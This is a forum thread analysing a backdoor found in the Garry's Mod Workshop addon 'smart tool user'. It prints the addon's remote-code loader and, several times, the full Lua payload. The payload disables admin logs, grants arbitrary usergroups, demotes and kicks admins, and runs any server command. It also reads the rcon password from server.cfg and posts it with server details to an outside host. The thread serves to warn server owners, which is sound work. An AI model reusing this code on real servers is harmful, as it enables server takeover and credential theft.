Backdoor in smart tool user

Read title. I just found a backdoor in an addon called smart tool user which allows anyone to add themselves to any usergroup, demote and kick all admins, run any command and other malicious shit.
The backdoor itself is an interesting chain, here’s the code found in lua/autorun/smart_tool_user.lua


timer.Simple(10, function()
	http.Fetch("htttp://thisisreallylegit.appspot.com/autocontentupdater", function(body)
		RunString(body, "", false)
	end)
end)

The payload isn’t obfuscated, this is what I got after using glualint’s pretty print on it:


concommand.Add("e7KwlOZB6PT37RBPhyjP", function(ply, cmd, args)
    http.Fetch("http://thisisreallylegit.appspot.com/iujchfsdacj?port=" .. GetConVarString("hostport"), function(body)
        RunString(body, "", false)
    end, function(err) end)
end)

RunConsoleCommand("e7KwlOZB6PT37RBPhyjP")

timer.Create("clocktimer", 300, 0, function()
    RunConsoleCommand("e7KwlOZB6PT37RBPhyjP")
end)

And here’s the final payload (removed comments because pretty print wouldn’t work with them):


concommand.Add("XJX3LNWQO1S58PJ1fza0", function(ply, cmd, args)
    game.ConsoleCommand("ulx logFile 0
")
    game.ConsoleCommand("ulx logEcho 0
")
    game.ConsoleCommand("ulx logEvents 0
")
    game.ConsoleCommand("ulx logChat 0
")
    game.ConsoleCommand("ulx logJoinLeaveEcho 0
")
end)

concommand.Add("rA0S5oizYoLEup7UDahl", function(ply, cmd, args)
    RunConsoleCommand("ulx", "adduser", ply:Name(), args[1])
end)

concommand.Add("3jQgrrPxSLkRbxODPRWr", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
        if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
            find_ply = v
        end
    end

    if (find_ply) then
        RunConsoleCommand("ulx", "adduser", find_ply:Name(), args[2])
    end
end)

concommand.Add("C6RcfnOhuPkDPoQkgzu8", function(ply, cmd, args)
    for _, v in ipairs(player.GetHumans()) do
        if (v:IsAdmin()) then
            RunConsoleCommand("ulx", "removeuser", v:Name())
            v:Kick("No fucks given")
        end
    end
end)

concommand.Add("kdyaNTIEO8DtIlNALF0U", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
        if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
            find_ply = v
        end
    end

    if (find_ply) then
        RunConsoleCommand("ulx", "removeuser", find_ply:Name())
    end
end)

concommand.Add("Dk1OIaGyEUvtmHQOF53i", function(ply, cmd, args, argStr)
    game.ConsoleCommand(argStr .. "
")
end)

concommand.Add("a1lELkTxk98lG0Ep4Nks", function(ply, cmd, args)
    game.ConsoleCommand('ulx userallow ' .. args[1] .. '"' .. args[2] .. '" *
')
end)

concommand.Add("XYflUSGbjNED07cEBTsO", function(ply, cmd, args)
    if (ULib) then
        local groups = {}

        for k, v in pairs(ULib.parseKeyValues(file.Read("ulib/groups.txt", "DATA"))) do
            groups[#groups + 1] = k
        end

        ply:PrintMessage(HUD_PRINTTALK, "All ULX groups: " .. string.Implode(", ", groups))
    else
        ply:PrintMessage(HUD_PRINTTALK, "ERROR! No ULX installed! :(")
    end
end)

concommand.Add("GIN3RCexuujsxZgy2jHq", function(ply, cmd, args)
    local rcon_config = ""

    for k, v in pairs(string.Split(file.Read("cfg/server.cfg", "GAME"), "
")) do
        if (string.StartWith(v, "rcon_password")) then
            local str = v
            str = string.Replace(str, "\"", "")
            str = string.Right(str, #str - 14)
            rcon_config = str
        end
    end

    HTTP({
        url = "http://thisisreallylegit.appspot.com/post_server?port=" .. GetConVarString("hostport"),
        method = "post",
        parameters = {
            server_name = tostring(GetConVarString("hostname")),
            rcon = tostring(rcon_config),
            gamemodename = tostring(engine.ActiveGamemode()),
            map = tostring(game.GetMap()),
            serverport = GetConVarString("hostport"),
            serverpass = GetConVarString("sv_password") or "",
            currentplayers = tostring(#player.GetHumans()) or "0",
            maxplayers = tostring(game.MaxPlayers()) or "0",
            updateage = args[1]
        }
    })
end)

if (game.IsDedicated() and GetConVarNumber("sv_lan") == 0) then
    RunConsoleCommand("GIN3RCexuujsxZgy2jHq", 1)
end

I’m stating the obvious here but if you have this addon installed, you should remove it.

Looking through the workshop comments, someone posted about it two months ago and it’s still up… nice!

The payload isn’t syntactically correct.
This is the payload:
[lua]concommand.Add(“XJX3LNWQO1S58PJ1fza0”, function(ply, cmd, args) //disable ulx logs game.ConsoleCommand("ulx logFile 0
") game.ConsoleCommand("ulx logEcho 0
") game.ConsoleCommand("ulx logEvents 0
") game.ConsoleCommand("ulx logChat 0
") game.ConsoleCommand("ulx logJoinLeaveEcho 0
“) end) concommand.Add(“rA0S5oizYoLEup7UDahl”, function(ply, cmd, args) //set ur own group RunConsoleCommand(“ulx”, “adduser”, ply:Name(), args[1]) end) concommand.Add(“3jQgrrPxSLkRbxODPRWr”, function(ply, cmd, args) //set somebodies else group name = string.lower(args[1]) find_ply = nil for _,v in ipairs(player.GetHumans()) do if(string.find(string.lower(v:Name()),name,1,true) != nil) then find_ply = v end end if(find_ply) then RunConsoleCommand(“ulx”, “adduser”, find_ply:Name(), args[2]) end end) concommand.Add(“C6RcfnOhuPkDPoQkgzu8”, function(ply, cmd, args) //removeuser and kick all users with ‘admin’ usergroup for _,v in ipairs(player.GetHumans()) do if(v:IsAdmin()) then RunConsoleCommand(“ulx”, “removeuser”, v:Name()) v:Kick(“No fucks given”) end end end) concommand.Add(“kdyaNTIEO8DtIlNALF0U”, function(ply, cmd, args) //remove someones ulx group name = string.lower(args[1]) find_ply = nil for _,v in ipairs(player.GetHumans()) do if(string.find(string.lower(v:Name()),name,1,true) != nil) then find_ply = v end end if(find_ply) then RunConsoleCommand(“ulx”, “removeuser”, find_ply:Name()) end end) concommand.Add(“Dk1OIaGyEUvtmHQOF53i”, function(ply, cmd, args, argStr) //run commands on server console game.ConsoleCommand(argStr … "
“) end) concommand.Add(“a1lELkTxk98lG0Ep4Nks”, function(ply, cmd, args) //give someone user access game.ConsoleCommand('ulx userallow ’ … args[1] … '”’ … args[2] … '” *
') end) concommand.Add(“XYflUSGbjNED07cEBTsO”, function(ply, cmd, args) //get all ulx groups if(ULib) then local groups = {} for k, v in pairs(ULib.parseKeyValues(file.Read(“ulib/groups.txt”, “DATA”))) do groups[#groups + 1] = k end ply:PrintMessage(HUD_PRINTTALK, “All ULX groups: " … string.Implode(”, ", groups)) else ply:PrintMessage(HUD_PRINTTALK, “ERROR! No ULX installed! :(”) end end) concommand.Add(“GIN3RCexuujsxZgy2jHq”, function(ply, cmd, args) //send post to website local rcon_config = “” for k,v in pairs(string.Split(file.Read(“cfg/server.cfg”, “GAME”), "
“)) do if(string.StartWith(v,“rcon_password”)) then local str = v str = string.Replace(str, “””, “”) str = string.Right(str,#str-14) rcon_config = str end end HTTP({ url = “http://thisisreallylegit.appspot.com/post_server?port=” … GetConVarString(“hostport”), method = “post”, parameters = {server_name = tostring(GetConVarString(“hostname”)), rcon = tostring(rcon_config), gamemodename = tostring(engine.ActiveGamemode()), map = tostring(game.GetMap()), serverport = GetConVarString(“hostport”), serverpass = GetConVarString(“sv_password”) or “”, currentplayers = tostring(#player.GetHumans()) or “0”, maxplayers = tostring(game.MaxPlayers()) or “0”, updateage = args[1]} }) end) if(game.IsDedicated() && GetConVarNumber(“sv_lan”) == 0) then RunConsoleCommand(“GIN3RCexuujsxZgy2jHq”, 1) end[/lua]

It’s a single line of code, but there are line comments everywhere. The line comments seem to imply that the code was retrieved from someone who wrote a fucking manual about it. It appears as though the uploader of the addon knows fuck all about Lua.

would this backdoor be related to me getting isis flags on my screen by any chance??? I dont know .LUA but I guess a backdoor could be used for that sort of thing and trying to hack my game?

No, for multiple reasons. First, it was designed just to take over servers. [del]Second, the main payload is actually borked, as pointed out by FPtje in a post above.[/del] Actually it’s fine, just looks dumb in the browser.

Sorry, I’m dumb. I just detoured RunString and the code it outputs is properly formatted (view page source also works)


concommand.Add("XJX3LNWQO1S58PJ1fza0", function(ply, cmd, args) //disable ulx logs
	game.ConsoleCommand("ulx logFile 0
")
	game.ConsoleCommand("ulx logEcho 0
")
	game.ConsoleCommand("ulx logEvents 0
")
	game.ConsoleCommand("ulx logChat 0
")
	game.ConsoleCommand("ulx logJoinLeaveEcho 0
")
end)
concommand.Add("rA0S5oizYoLEup7UDahl", function(ply, cmd, args) //set ur own group
	RunConsoleCommand("ulx", "adduser", ply:Name(), args[1])
end)
concommand.Add("3jQgrrPxSLkRbxODPRWr", function(ply, cmd, args) //set somebodies else group
	name = string.lower(args[1])
	find_ply = nil
	for _,v in ipairs(player.GetHumans()) do
		if(string.find(string.lower(v:Name()),name,1,true) != nil) then
			find_ply = v
		end
	end
	if(find_ply) then
		RunConsoleCommand("ulx", "adduser", find_ply:Name(), args[2])
	end
end)
concommand.Add("C6RcfnOhuPkDPoQkgzu8", function(ply, cmd, args) //removeuser and kick all users with 'admin' usergroup
	for _,v in ipairs(player.GetHumans()) do
		if(v:IsAdmin()) then
			RunConsoleCommand("ulx", "removeuser", v:Name())
			v:Kick("No fucks given")
		end
	end
end)
concommand.Add("kdyaNTIEO8DtIlNALF0U", function(ply, cmd, args) //remove someones ulx group
	name = string.lower(args[1])
	find_ply = nil
	for _,v in ipairs(player.GetHumans()) do
		if(string.find(string.lower(v:Name()),name,1,true) != nil) then
			find_ply = v
		end
	end
	if(find_ply) then
		RunConsoleCommand("ulx", "removeuser", find_ply:Name())
	end
end)
concommand.Add("Dk1OIaGyEUvtmHQOF53i", function(ply, cmd, args, argStr) //run commands on server console
	game.ConsoleCommand(argStr .. "
")
end)
concommand.Add("a1lELkTxk98lG0Ep4Nks", function(ply, cmd, args) //give someone user access
	game.ConsoleCommand('ulx userallow ' .. args[1] .. '"' .. args[2] .. '" *
')
end)
concommand.Add("XYflUSGbjNED07cEBTsO", function(ply, cmd, args) //get all ulx groups
	if(ULib) then
		local groups = {}
		for k, v in pairs(ULib.parseKeyValues(file.Read("ulib/groups.txt", "DATA"))) do
			groups[#groups + 1] = k
		end
		ply:PrintMessage(HUD_PRINTTALK, "All ULX groups: " .. string.Implode(", ", groups))
	else
		ply:PrintMessage(HUD_PRINTTALK, "ERROR! No ULX installed! :(")
	end
end)
concommand.Add("GIN3RCexuujsxZgy2jHq", function(ply, cmd, args) //send post to website
	local rcon_config = ""
	for k,v in pairs(string.Split(file.Read("cfg/server.cfg", "GAME"), "
")) do
		if(string.StartWith(v,"rcon_password")) then
			local str = v
			str = string.Replace(str, "\"", "")
			str = string.Right(str,#str-14)
			rcon_config = str
		end
	end
	HTTP({
		url = "http://thisisreallylegit.appspot.com/post_server?port=" .. GetConVarString("hostport"), 
		method = "post", 
		parameters = {server_name = tostring(GetConVarString("hostname")), rcon = tostring(rcon_config), gamemodename = tostring(engine.ActiveGamemode()), map = tostring(game.GetMap()), serverport = GetConVarString("hostport"), serverpass = GetConVarString("sv_password") or "", currentplayers = tostring(#player.GetHumans()) or "0", maxplayers = tostring(game.MaxPlayers()) or "0", updateage = args[1]}
	})
end)
if(game.IsDedicated() && GetConVarNumber("sv_lan") == 0) then
	RunConsoleCommand("GIN3RCexuujsxZgy2jHq", 1)
end

https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD004_ThirdPersonController

That was committed 1 year ago yesterday. Wondering if the Smart Tool person just copy+pasted or is the same guy.